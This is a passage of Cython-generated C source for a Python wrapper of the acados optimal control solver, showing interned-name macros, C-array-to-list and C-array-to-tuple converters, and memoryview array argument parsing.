__pyx_mstate_global->__pyx_n_u_qp_warm_start +#define __pyx_n_u_r __pyx_mstate_global->__pyx_n_u_r +#define __pyx_n_s_range __pyx_mstate_global->__pyx_n_s_range +#define __pyx_n_s_recompute __pyx_mstate_global->__pyx_n_s_recompute +#define __pyx_n_s_reduce __pyx_mstate_global->__pyx_n_s_reduce +#define __pyx_n_s_reduce_cython __pyx_mstate_global->__pyx_n_s_reduce_cython +#define __pyx_n_s_reduce_ex __pyx_mstate_global->__pyx_n_s_reduce_ex +#define __pyx_n_s_register __pyx_mstate_global->__pyx_n_s_register +#define __pyx_n_b_res_comp __pyx_mstate_global->__pyx_n_b_res_comp +#define __pyx_n_b_res_eq __pyx_mstate_global->__pyx_n_b_res_eq +#define __pyx_n_b_res_ineq __pyx_mstate_global->__pyx_n_b_res_ineq +#define __pyx_n_b_res_stat __pyx_mstate_global->__pyx_n_b_res_stat +#define __pyx_n_s_reset __pyx_mstate_global->__pyx_n_s_reset +#define __pyx_n_u_residuals __pyx_mstate_global->__pyx_n_u_residuals +#define __pyx_n_u_rti_phase __pyx_mstate_global->__pyx_n_u_rti_phase +#define __pyx_n_s_self __pyx_mstate_global->__pyx_n_s_self +#define __pyx_n_s_set __pyx_mstate_global->__pyx_n_s_set +#define __pyx_n_s_set_new_time_steps __pyx_mstate_global->__pyx_n_s_set_new_time_steps +#define __pyx_n_s_setstate __pyx_mstate_global->__pyx_n_s_setstate +#define __pyx_n_s_setstate_cython __pyx_mstate_global->__pyx_n_s_setstate_cython +#define __pyx_n_s_shape __pyx_mstate_global->__pyx_n_s_shape +#define __pyx_n_s_size __pyx_mstate_global->__pyx_n_s_size +#define __pyx_n_u_sl __pyx_mstate_global->__pyx_n_u_sl +#define __pyx_n_u_sl_2 __pyx_mstate_global->__pyx_n_u_sl_2 +#define __pyx_n_s_solution __pyx_mstate_global->__pyx_n_s_solution +#define __pyx_n_s_solve __pyx_mstate_global->__pyx_n_s_solve +#define __pyx_kp_u_solver_option_must_be_of_type_fl __pyx_mstate_global->__pyx_kp_u_solver_option_must_be_of_type_fl +#define __pyx_kp_u_solver_option_must_be_of_type_in __pyx_mstate_global->__pyx_kp_u_solver_option_must_be_of_type_in +#define __pyx_kp_u_solver_option_must_be_of_type_st __pyx_mstate_global->__pyx_kp_u_solver_option_must_be_of_type_st +#define __pyx_n_s_sort_keys __pyx_mstate_global->__pyx_n_s_sort_keys +#define __pyx_n_s_spec __pyx_mstate_global->__pyx_n_s_spec +#define __pyx_n_s_split __pyx_mstate_global->__pyx_n_s_split +#define __pyx_n_s_sqp_iter __pyx_mstate_global->__pyx_n_s_sqp_iter +#define __pyx_n_u_sqp_iter __pyx_mstate_global->__pyx_n_u_sqp_iter +#define __pyx_n_s_stage __pyx_mstate_global->__pyx_n_s_stage +#define __pyx_n_s_start __pyx_mstate_global->__pyx_n_s_start +#define __pyx_n_s_stat_m __pyx_mstate_global->__pyx_n_s_stat_m +#define __pyx_n_u_stat_m __pyx_mstate_global->__pyx_n_u_stat_m +#define __pyx_n_s_stat_n __pyx_mstate_global->__pyx_n_s_stat_n +#define __pyx_n_u_stat_n __pyx_mstate_global->__pyx_n_u_stat_n +#define __pyx_n_u_statistics __pyx_mstate_global->__pyx_n_u_statistics +#define __pyx_n_s_step __pyx_mstate_global->__pyx_n_s_step +#define __pyx_n_u_step_length __pyx_mstate_global->__pyx_n_u_step_length +#define __pyx_n_s_stop __pyx_mstate_global->__pyx_n_s_stop +#define __pyx_n_s_store_iterate __pyx_mstate_global->__pyx_n_s_store_iterate +#define __pyx_n_s_store_iterate_locals_lambda __pyx_mstate_global->__pyx_n_s_store_iterate_locals_lambda +#define __pyx_kp_u_stored_current_iterate_in __pyx_mstate_global->__pyx_kp_u_stored_current_iterate_in +#define __pyx_n_s_strftime __pyx_mstate_global->__pyx_n_s_strftime +#define __pyx_kp_s_strided_and_direct __pyx_mstate_global->__pyx_kp_s_strided_and_direct +#define __pyx_kp_s_strided_and_direct_or_indirect __pyx_mstate_global->__pyx_kp_s_strided_and_direct_or_indirect +#define __pyx_kp_s_strided_and_indirect __pyx_mstate_global->__pyx_kp_s_strided_and_indirect +#define __pyx_n_s_string_fields __pyx_mstate_global->__pyx_n_s_string_fields +#define __pyx_n_s_string_value __pyx_mstate_global->__pyx_n_s_string_value +#define __pyx_kp_s_stringsource __pyx_mstate_global->__pyx_kp_s_stringsource +#define __pyx_n_s_struct __pyx_mstate_global->__pyx_n_s_struct +#define __pyx_n_u_su __pyx_mstate_global->__pyx_n_u_su +#define __pyx_n_u_su_2 __pyx_mstate_global->__pyx_n_u_su_2 +#define __pyx_n_s_sys __pyx_mstate_global->__pyx_n_s_sys +#define __pyx_n_u_t __pyx_mstate_global->__pyx_n_u_t +#define __pyx_n_u_t_2 __pyx_mstate_global->__pyx_n_u_t_2 +#define __pyx_n_s_test __pyx_mstate_global->__pyx_n_s_test +#define __pyx_kp_s_third_party_acados_acados_templa __pyx_mstate_global->__pyx_kp_s_third_party_acados_acados_templa +#define __pyx_n_u_time_glob __pyx_mstate_global->__pyx_n_u_time_glob +#define __pyx_n_u_time_lin __pyx_mstate_global->__pyx_n_u_time_lin +#define __pyx_n_u_time_qp __pyx_mstate_global->__pyx_n_u_time_qp +#define __pyx_n_u_time_qp_solver_call __pyx_mstate_global->__pyx_n_u_time_qp_solver_call +#define __pyx_n_u_time_qp_xcond __pyx_mstate_global->__pyx_n_u_time_qp_xcond +#define __pyx_n_u_time_reg __pyx_mstate_global->__pyx_n_u_time_reg +#define __pyx_n_u_time_sim __pyx_mstate_global->__pyx_n_u_time_sim +#define __pyx_n_u_time_sim_ad __pyx_mstate_global->__pyx_n_u_time_sim_ad +#define __pyx_n_u_time_sim_la __pyx_mstate_global->__pyx_n_u_time_sim_la +#define __pyx_n_u_time_solution_sensitivities __pyx_mstate_global->__pyx_n_u_time_solution_sensitivities +#define __pyx_n_u_time_tot __pyx_mstate_global->__pyx_n_u_time_tot +#define __pyx_n_u_tol_comp __pyx_mstate_global->__pyx_n_u_tol_comp +#define __pyx_n_u_tol_eq __pyx_mstate_global->__pyx_n_u_tol_eq +#define __pyx_n_u_tol_ineq __pyx_mstate_global->__pyx_n_u_tol_ineq +#define __pyx_n_u_tol_stat __pyx_mstate_global->__pyx_n_u_tol_stat +#define __pyx_n_s_tolist __pyx_mstate_global->__pyx_n_s_tolist +#define __pyx_n_u_u __pyx_mstate_global->__pyx_n_u_u +#define __pyx_n_u_u_2 __pyx_mstate_global->__pyx_n_u_u_2 +#define __pyx_n_u_ubu __pyx_mstate_global->__pyx_n_u_ubu +#define __pyx_n_u_ubx __pyx_mstate_global->__pyx_n_u_ubx +#define __pyx_kp_s_unable_to_allocate_array_data __pyx_mstate_global->__pyx_kp_s_unable_to_allocate_array_data +#define __pyx_kp_s_unable_to_allocate_shape_and_str __pyx_mstate_global->__pyx_kp_s_unable_to_allocate_shape_and_str +#define __pyx_n_s_unpack __pyx_mstate_global->__pyx_n_s_unpack +#define __pyx_n_s_update __pyx_mstate_global->__pyx_n_s_update +#define __pyx_n_s_update_qp_solver_cond_N __pyx_mstate_global->__pyx_n_s_update_qp_solver_cond_N +#define __pyx_n_s_utcnow __pyx_mstate_global->__pyx_n_s_utcnow +#define __pyx_kp_u_utf_8 __pyx_mstate_global->__pyx_kp_u_utf_8 +#define __pyx_n_s_value __pyx_mstate_global->__pyx_n_s_value +#define __pyx_n_s_value_2 __pyx_mstate_global->__pyx_n_s_value_2 +#define __pyx_n_s_value_shape __pyx_mstate_global->__pyx_n_s_value_shape +#define __pyx_n_s_version_info __pyx_mstate_global->__pyx_n_s_version_info +#define __pyx_n_u_w __pyx_mstate_global->__pyx_n_u_w +#define __pyx_n_u_warm_start_first_qp __pyx_mstate_global->__pyx_n_u_warm_start_first_qp +#define __pyx_kp_u_with_dimension __pyx_mstate_global->__pyx_kp_u_with_dimension +#define __pyx_kp_u_with_dimension_you_have __pyx_mstate_global->__pyx_kp_u_with_dimension_you_have +#define __pyx_n_b_x __pyx_mstate_global->__pyx_n_b_x +#define __pyx_n_s_x __pyx_mstate_global->__pyx_n_s_x +#define __pyx_n_u_x __pyx_mstate_global->__pyx_n_u_x +#define __pyx_n_u_x_2 __pyx_mstate_global->__pyx_n_u_x_2 +#define __pyx_n_u_xdot_guess __pyx_mstate_global->__pyx_n_u_xdot_guess +#define __pyx_n_u_y_ref __pyx_mstate_global->__pyx_n_u_y_ref +#define __pyx_kp_u_you_have __pyx_mstate_global->__pyx_kp_u_you_have +#define __pyx_n_u_yref __pyx_mstate_global->__pyx_n_u_yref +#define __pyx_n_u_z __pyx_mstate_global->__pyx_n_u_z +#define __pyx_n_u_z_2 __pyx_mstate_global->__pyx_n_u_z_2 +#define __pyx_n_u_z_guess __pyx_mstate_global->__pyx_n_u_z_guess +#define __pyx_n_s_zeros __pyx_mstate_global->__pyx_n_s_zeros +#define __pyx_int_0 __pyx_mstate_global->__pyx_int_0 +#define __pyx_int_1 __pyx_mstate_global->__pyx_int_1 +#define __pyx_int_2 __pyx_mstate_global->__pyx_int_2 +#define __pyx_int_3 __pyx_mstate_global->__pyx_int_3 +#define __pyx_int_4 __pyx_mstate_global->__pyx_int_4 +#define __pyx_int_6 __pyx_mstate_global->__pyx_int_6 +#define __pyx_int_7 __pyx_mstate_global->__pyx_int_7 +#define __pyx_int_112105877 __pyx_mstate_global->__pyx_int_112105877 +#define __pyx_int_136983863 __pyx_mstate_global->__pyx_int_136983863 +#define __pyx_int_184977713 __pyx_mstate_global->__pyx_int_184977713 +#define __pyx_int_neg_1 __pyx_mstate_global->__pyx_int_neg_1 +#define __pyx_int_neg_5 __pyx_mstate_global->__pyx_int_neg_5 +#define __pyx_slice__5 __pyx_mstate_global->__pyx_slice__5 +#define __pyx_tuple__4 __pyx_mstate_global->__pyx_tuple__4 +#define __pyx_tuple__8 __pyx_mstate_global->__pyx_tuple__8 +#define __pyx_tuple__9 __pyx_mstate_global->__pyx_tuple__9 +#define __pyx_slice__16 __pyx_mstate_global->__pyx_slice__16 +#define __pyx_tuple__10 __pyx_mstate_global->__pyx_tuple__10 +#define __pyx_tuple__11 __pyx_mstate_global->__pyx_tuple__11 +#define __pyx_tuple__12 __pyx_mstate_global->__pyx_tuple__12 +#define __pyx_tuple__13 __pyx_mstate_global->__pyx_tuple__13 +#define __pyx_tuple__17 __pyx_mstate_global->__pyx_tuple__17 +#define __pyx_tuple__18 __pyx_mstate_global->__pyx_tuple__18 +#define __pyx_tuple__19 __pyx_mstate_global->__pyx_tuple__19 +#define __pyx_tuple__20 __pyx_mstate_global->__pyx_tuple__20 +#define __pyx_tuple__21 __pyx_mstate_global->__pyx_tuple__21 +#define __pyx_tuple__22 __pyx_mstate_global->__pyx_tuple__22 +#define __pyx_tuple__23 __pyx_mstate_global->__pyx_tuple__23 +#define __pyx_tuple__24 __pyx_mstate_global->__pyx_tuple__24 +#define __pyx_tuple__25 __pyx_mstate_global->__pyx_tuple__25 +#define __pyx_tuple__26 __pyx_mstate_global->__pyx_tuple__26 +#define __pyx_tuple__27 __pyx_mstate_global->__pyx_tuple__27 +#define __pyx_tuple__28 __pyx_mstate_global->__pyx_tuple__28 +#define __pyx_tuple__30 __pyx_mstate_global->__pyx_tuple__30 +#define __pyx_tuple__31 __pyx_mstate_global->__pyx_tuple__31 +#define __pyx_tuple__32 __pyx_mstate_global->__pyx_tuple__32 +#define __pyx_tuple__33 __pyx_mstate_global->__pyx_tuple__33 +#define __pyx_tuple__34 __pyx_mstate_global->__pyx_tuple__34 +#define __pyx_tuple__35 __pyx_mstate_global->__pyx_tuple__35 +#define __pyx_tuple__36 __pyx_mstate_global->__pyx_tuple__36 +#define __pyx_tuple__37 __pyx_mstate_global->__pyx_tuple__37 +#define __pyx_tuple__38 __pyx_mstate_global->__pyx_tuple__38 +#define __pyx_tuple__39 __pyx_mstate_global->__pyx_tuple__39 +#define __pyx_tuple__41 __pyx_mstate_global->__pyx_tuple__41 +#define __pyx_tuple__45 __pyx_mstate_global->__pyx_tuple__45 +#define __pyx_tuple__47 __pyx_mstate_global->__pyx_tuple__47 +#define __pyx_tuple__49 __pyx_mstate_global->__pyx_tuple__49 +#define __pyx_tuple__51 __pyx_mstate_global->__pyx_tuple__51 +#define __pyx_tuple__52 __pyx_mstate_global->__pyx_tuple__52 +#define __pyx_tuple__55 __pyx_mstate_global->__pyx_tuple__55 +#define __pyx_tuple__57 __pyx_mstate_global->__pyx_tuple__57 +#define __pyx_tuple__58 __pyx_mstate_global->__pyx_tuple__58 +#define __pyx_tuple__60 __pyx_mstate_global->__pyx_tuple__60 +#define __pyx_tuple__62 __pyx_mstate_global->__pyx_tuple__62 +#define __pyx_tuple__65 __pyx_mstate_global->__pyx_tuple__65 +#define __pyx_tuple__67 __pyx_mstate_global->__pyx_tuple__67 +#define __pyx_tuple__69 __pyx_mstate_global->__pyx_tuple__69 +#define __pyx_tuple__71 __pyx_mstate_global->__pyx_tuple__71 +#define __pyx_tuple__72 __pyx_mstate_global->__pyx_tuple__72 +#define __pyx_tuple__74 __pyx_mstate_global->__pyx_tuple__74 +#define __pyx_tuple__77 __pyx_mstate_global->__pyx_tuple__77 +#define __pyx_tuple__79 __pyx_mstate_global->__pyx_tuple__79 +#define __pyx_tuple__82 __pyx_mstate_global->__pyx_tuple__82 +#define __pyx_codeobj__40 __pyx_mstate_global->__pyx_codeobj__40 +#define __pyx_codeobj__42 __pyx_mstate_global->__pyx_codeobj__42 +#define __pyx_codeobj__43 __pyx_mstate_global->__pyx_codeobj__43 +#define __pyx_codeobj__44 __pyx_mstate_global->__pyx_codeobj__44 +#define __pyx_codeobj__46 __pyx_mstate_global->__pyx_codeobj__46 +#define __pyx_codeobj__48 __pyx_mstate_global->__pyx_codeobj__48 +#define __pyx_codeobj__50 __pyx_mstate_global->__pyx_codeobj__50 +#define __pyx_codeobj__53 __pyx_mstate_global->__pyx_codeobj__53 +#define __pyx_codeobj__54 __pyx_mstate_global->__pyx_codeobj__54 +#define __pyx_codeobj__56 __pyx_mstate_global->__pyx_codeobj__56 +#define __pyx_codeobj__59 __pyx_mstate_global->__pyx_codeobj__59 +#define __pyx_codeobj__61 __pyx_mstate_global->__pyx_codeobj__61 +#define __pyx_codeobj__63 __pyx_mstate_global->__pyx_codeobj__63 +#define __pyx_codeobj__64 __pyx_mstate_global->__pyx_codeobj__64 +#define __pyx_codeobj__66 __pyx_mstate_global->__pyx_codeobj__66 +#define __pyx_codeobj__68 __pyx_mstate_global->__pyx_codeobj__68 +#define __pyx_codeobj__70 __pyx_mstate_global->__pyx_codeobj__70 +#define __pyx_codeobj__73 __pyx_mstate_global->__pyx_codeobj__73 +#define __pyx_codeobj__75 __pyx_mstate_global->__pyx_codeobj__75 +#define __pyx_codeobj__76 __pyx_mstate_global->__pyx_codeobj__76 +#define __pyx_codeobj__78 __pyx_mstate_global->__pyx_codeobj__78 +#define __pyx_codeobj__80 __pyx_mstate_global->__pyx_codeobj__80 +#define __pyx_codeobj__81 __pyx_mstate_global->__pyx_codeobj__81 +#define __pyx_codeobj__83 __pyx_mstate_global->__pyx_codeobj__83 +/* #### Code section: module_code ### */ + +/* "carray.to_py":114 + * + * @cname("__Pyx_carray_to_py_int") + * cdef inline list __Pyx_carray_to_py_int(base_type *v, Py_ssize_t length): # <<<<<<<<<<<<<< + * cdef size_t i + * cdef object value + */ + +static CYTHON_INLINE PyObject *__Pyx_carray_to_py_int(int *__pyx_v_v, Py_ssize_t __pyx_v_length) { + size_t __pyx_v_i; + PyObject *__pyx_v_value = 0; + PyObject *__pyx_v_l = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + size_t __pyx_t_2; + size_t __pyx_t_3; + size_t __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_carray_to_py_int", 0); + + /* "carray.to_py":117 + * cdef size_t i + * cdef object value + * l = PyList_New(length) # <<<<<<<<<<<<<< + * for i in range(length): + * value = v[i] + */ + __pyx_t_1 = PyList_New(__pyx_v_length); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 117, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_l = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "carray.to_py":118 + * cdef object value + * l = PyList_New(length) + * for i in range(length): # <<<<<<<<<<<<<< + * value = v[i] + * Py_INCREF(value) + */ + __pyx_t_2 = ((size_t)__pyx_v_length); + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "carray.to_py":119 + * l = PyList_New(length) + * for i in range(length): + * value = v[i] # <<<<<<<<<<<<<< + * Py_INCREF(value) + * PyList_SET_ITEM(l, i, value) + */ + __pyx_t_1 = __Pyx_PyInt_From_int((__pyx_v_v[__pyx_v_i])); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 119, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_XDECREF_SET(__pyx_v_value, __pyx_t_1); + __pyx_t_1 = 0; + + /* "carray.to_py":120 + * for i in range(length): + * value = v[i] + * Py_INCREF(value) # <<<<<<<<<<<<<< + * PyList_SET_ITEM(l, i, value) + * return l + */ + Py_INCREF(__pyx_v_value); + + /* "carray.to_py":121 + * value = v[i] + * Py_INCREF(value) + * PyList_SET_ITEM(l, i, value) # <<<<<<<<<<<<<< + * return l + * + */ + PyList_SET_ITEM(__pyx_v_l, __pyx_v_i, __pyx_v_value); + } + + /* "carray.to_py":122 + * Py_INCREF(value) + * PyList_SET_ITEM(l, i, value) + * return l # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_l); + __pyx_r = __pyx_v_l; + goto __pyx_L0; + + /* "carray.to_py":114 + * + * @cname("__Pyx_carray_to_py_int") + * cdef inline list __Pyx_carray_to_py_int(base_type *v, Py_ssize_t length): # <<<<<<<<<<<<<< + * cdef size_t i + * cdef object value + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("carray.to_py.__Pyx_carray_to_py_int", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_value); + __Pyx_XDECREF(__pyx_v_l); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "carray.to_py":126 + * + * @cname("__Pyx_carray_to_tuple_int") + * cdef inline tuple __Pyx_carray_to_tuple_int(base_type *v, Py_ssize_t length): # <<<<<<<<<<<<<< + * cdef size_t i + * cdef object value + */ + +static CYTHON_INLINE PyObject *__Pyx_carray_to_tuple_int(int *__pyx_v_v, Py_ssize_t __pyx_v_length) { + size_t __pyx_v_i; + PyObject *__pyx_v_value = 0; + PyObject *__pyx_v_t = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + size_t __pyx_t_2; + size_t __pyx_t_3; + size_t __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_carray_to_tuple_int", 0); + + /* "carray.to_py":129 + * cdef size_t i + * cdef object value + * t = PyTuple_New(length) # <<<<<<<<<<<<<< + * for i in range(length): + * value = v[i] + */ + __pyx_t_1 = PyTuple_New(__pyx_v_length); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 129, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_t = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "carray.to_py":130 + * cdef object value + * t = PyTuple_New(length) + * for i in range(length): # <<<<<<<<<<<<<< + * value = v[i] + * Py_INCREF(value) + */ + __pyx_t_2 = ((size_t)__pyx_v_length); + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "carray.to_py":131 + * t = PyTuple_New(length) + * for i in range(length): + * value = v[i] # <<<<<<<<<<<<<< + * Py_INCREF(value) + * PyTuple_SET_ITEM(t, i, value) + */ + __pyx_t_1 = __Pyx_PyInt_From_int((__pyx_v_v[__pyx_v_i])); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 131, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_XDECREF_SET(__pyx_v_value, __pyx_t_1); + __pyx_t_1 = 0; + + /* "carray.to_py":132 + * for i in range(length): + * value = v[i] + * Py_INCREF(value) # <<<<<<<<<<<<<< + * PyTuple_SET_ITEM(t, i, value) + * return t + */ + Py_INCREF(__pyx_v_value); + + /* "carray.to_py":133 + * value = v[i] + * Py_INCREF(value) + * PyTuple_SET_ITEM(t, i, value) # <<<<<<<<<<<<<< + * return t + */ + PyTuple_SET_ITEM(__pyx_v_t, __pyx_v_i, __pyx_v_value); + } + + /* "carray.to_py":134 + * Py_INCREF(value) + * PyTuple_SET_ITEM(t, i, value) + * return t # <<<<<<<<<<<<<< + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_t); + __pyx_r = __pyx_v_t; + goto __pyx_L0; + + /* "carray.to_py":126 + * + * @cname("__Pyx_carray_to_tuple_int") + * cdef inline tuple __Pyx_carray_to_tuple_int(base_type *v, Py_ssize_t length): # <<<<<<<<<<<<<< + * cdef size_t i + * cdef object value + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("carray.to_py.__Pyx_carray_to_tuple_int", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_value); + __Pyx_XDECREF(__pyx_v_t); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":131 + * cdef bint dtype_is_object + * + * def __cinit__(array self, tuple shape, Py_ssize_t itemsize, format not None, # <<<<<<<<<<<<<< + * mode="c", bint allocate_buffer=True): + * + */ + +/* Python wrapper */ +static int __pyx_array___cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_array___cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_shape = 0; + Py_ssize_t __pyx_v_itemsize; + PyObject *__pyx_v_format = 0; + PyObject *__pyx_v_mode = 0; + int __pyx_v_allocate_buffer; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_shape,&__pyx_n_s_itemsize,&__pyx_n_s_format,&__pyx_n_s_mode,&__pyx_n_s_allocate_buffer,0}; + PyObject* values[5] = {0,0,0,0,0}; + values[3] = ((PyObject *)__pyx_n_s_c); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 5: values[4] = __Pyx_Arg_VARARGS(__pyx_args, 4); + CYTHON_FALLTHROUGH; + case 4: values[3] = __Pyx_Arg_VARARGS(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_shape)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_itemsize)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 3, 5, 1); __PYX_ERR(1, 131, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_format)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 3, 5, 2); __PYX_ERR(1, 131, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 3: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_mode); + if (value) { values[3] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 4: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_allocate_buffer); + if (value) { values[4] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__cinit__") < 0)) __PYX_ERR(1, 131, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 5: values[4] = __Pyx_Arg_VARARGS(__pyx_args, 4); + CYTHON_FALLTHROUGH; + case 4: values[3] = __Pyx_Arg_VARARGS(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_shape = ((PyObject*)values[0]); + __pyx_v_itemsize = __Pyx_PyIndex_AsSsize_t(values[1]); if (unlikely((__pyx_v_itemsize == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + __pyx_v_format = values[2]; + __pyx_v_mode = values[3]; + if (values[4]) { + __pyx_v_allocate_buffer = __Pyx_PyObject_IsTrue(values[4]); if (unlikely((__pyx_v_allocate_buffer == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 132, __pyx_L3_error) + } else { + + /* "View.MemoryView":132 + * + * def __cinit__(array self, tuple shape, Py_ssize_t itemsize, format not None, + * mode="c", bint allocate_buffer=True): # <<<<<<<<<<<<<< + * + * cdef int idx + */ + __pyx_v_allocate_buffer = ((int)1); + } + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 3, 5, __pyx_nargs); __PYX_ERR(1, 131, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.array.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_shape), (&PyTuple_Type), 1, "shape", 1))) __PYX_ERR(1, 131, __pyx_L1_error) + if (unlikely(((PyObject *)__pyx_v_format) == Py_None)) { + PyErr_Format(PyExc_TypeError, "Argument '%.200s' must not be None", "format"); __PYX_ERR(1, 131, __pyx_L1_error) + } + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array___cinit__(((struct __pyx_array_obj *)__pyx_v_self), __pyx_v_shape, __pyx_v_itemsize, __pyx_v_format, __pyx_v_mode, __pyx_v_allocate_buffer); + + /* "View.MemoryView":131 + * cdef bint dtype_is_object + * + * def __cinit__(array self, tuple shape, Py_ssize_t itemsize, format not None, # <<<<<<<<<<<<<< + * mode="c", bint allocate_buffer=True): + * + */ + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array___cinit__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_shape, Py_ssize_t __pyx_v_itemsize, PyObject *__pyx_v_format, PyObject *__pyx_v_mode, int __pyx_v_allocate_buffer) { + int __pyx_v_idx; + Py_ssize_t __pyx_v_dim; + char __pyx_v_order; + int __pyx_r; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + int __pyx_t_7; + char *__pyx_t_8; + Py_ssize_t 